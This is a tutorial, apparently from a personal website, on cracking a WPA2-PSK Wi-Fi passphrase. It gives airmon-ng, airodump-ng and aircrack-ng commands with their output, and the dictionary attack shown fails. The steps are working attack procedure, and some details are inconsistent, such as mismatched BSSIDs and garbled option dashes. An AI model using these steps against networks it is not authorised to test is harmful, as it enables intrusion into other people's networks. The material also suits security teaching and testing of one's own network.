Cracking WPA2-PSK with Kali Linux
(brute force with dictionary)

One of the most common attacks is against WPA2 is exploiting a weak passphrase.

Hardware : Alfa AWUS051NH wifi adapter

The iwconfig command will show any wireless cards in the system.

# iwconfig
wlan0     IEEE 802.11bgn  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
lo        no wireless extensions.

eth0      no wireless extensions.

# ifconfig
eth0: flags=4099  mtu 1500
        ether 00:23:8b:f0:9e:eb  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10
        loop  txqueuelen 1  (Local Loopback)
        RX packets 1440  bytes 116640 (113.9 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1440  bytes 116640 (113.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099  mtu 1500
        ether 00:26:5e:0f:a2:15  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

# ifconfig wlan0 up

# iwlist wlan0 scanning
wlan0     Scan completed :
          Cell 01 - Address: 00:47:B7:70:1A:1E
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Quality=47/70  Signal level=-63 dBm  
                    Encryption key:on
                    ESSID:"Home-Wifi"
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s
                    Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
                    Mode:Master
                    Extra:tsf=000003d892db3984
                    Extra: Last beacon: 472ms ago
                    IE: Unknown: 0014546F7572696E67436C756252686F64616E69656E
                    IE: Unknown: 010882848B960C121824
                    IE: Unknown: 030106
                    IE: Unknown: 0706465220010D14
                    IE: Unknown: 2A0100
                    IE: Unknown: 32043048606C
                    IE: Unknown: 2D1AAD011BFFFF000000000000000000000000000000000000000000
                    IE: Unknown: 331AAD011BFFFF000000000000000000000000000000000000000000
                    IE: Unknown: 3D1606000100000000000000000000000000000000000000
                    IE: Unknown: 341606000100000000000000000000000000000000000000
                    IE: Unknown: DD180050F2020101860003A4000027A4000042435E0062322F00
                    IE: Unknown: DD0900037F01010000FF7F
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : CCMP
                        Pairwise Ciphers (1) : CCMP
                        Authentication Suites (1) : PSK
                    IE: Unknown: DDA90050F204104A0001101044000102103B000103104700

create the monitor interface with the command:

# airmon-ng start wlan0

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  370 NetworkManager
  489 wpa_supplicant

PHY	Interface	Driver		Chipset

phy0	wlan0		ath9k		Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)

		(mac80211 monitor mode vif enabled for [phy0]
wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0)

# ifconfig
eth0: flags=4099  mtu 1500
        ether 00:23:8b:f0:9e:eb  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10
        loop  txqueuelen 1  (Local Loopback)
        RX packets 2560  bytes 207360 (202.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2560  bytes 207360 (202.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0mon: flags=4163  mtu 1500
        unspec 00-26-5E-0F-A2-15-30-30-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 5084  bytes 1056710 (1.0 MiB)
        RX errors 0  dropped 5084  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Use airodump-ng to capture the WPA2 handshake :
# airodump-ng wlan0mon – -bssid 00:47:B7:70:1A:1E – –channel 6 – –write CaptureWPA
(CaptureWPA is name of the file we will save to)

CH  6 ][ Elapsed: 54 s ][ 2017-04-29 12:00                                    
                                                                               
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                               
 00:37:B7:80:1A:1E  -65 100      571        0    0   6  54e. WPA2 CCMP   PSK  Home-Wifi
                                                                               
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

When is no client DATA = 0, so network with clients is to prefer.
or you must generate traffic with special techniques

# aircrack-ng CaptureWPA-01.cap -w BIG-WPA-LIST-1
(BIG-WPA-LIST-1name of your dictionary file)
The dictionary file darkc0de.lst is a popular worldlist that ships with BackTrack5
Kali does not come with the darkc0de.lst but you can download worldlist from the net.

  Aircrack-ng 1.2 rc4

      [03:58:23] 96564163/99563408 keys tested (7270.07 k/s) 

      Time left: 0 seconds                                      96.99%

                       Current passphrase: 8situarla                  


      Master Key     : 8C D7 10 C7 F9 55 F3 31 42 8F 50 B3 D5 11 50 54 
                       5A CD 7A 98 71 A6 13 7D 42 8F 82 2A E5 34 60 6D 

      Transient Key  : 4B 33 0F 6B 1C 4F 01 36 C8 B4 8C B2 3B 5D A1 13 
                       7C D9 33 9E B1 A3 3B DA 0F F2 2F 6E E6 E3 0E 86 
                       14 63 A6 1B 41 3D B2 79 21 12 51 06 6A EF 02 45 
                       A7 CA 25 88 16 C8 85 68 34 80 4F 1A 84 D8 62 2F 

      EAPOL HMAC     : 9E 33 72 A4 20 1C 53 BC 8A 50 33 35 F9 75 77 1A 

Passphrase not in dictionary

MXOR.COM[personal website]

Cracking WPA2-PSK with Kali Linux (brute force with dictionary)

Cracking WPA2-PSK with Kali Linux
(brute force with dictionary)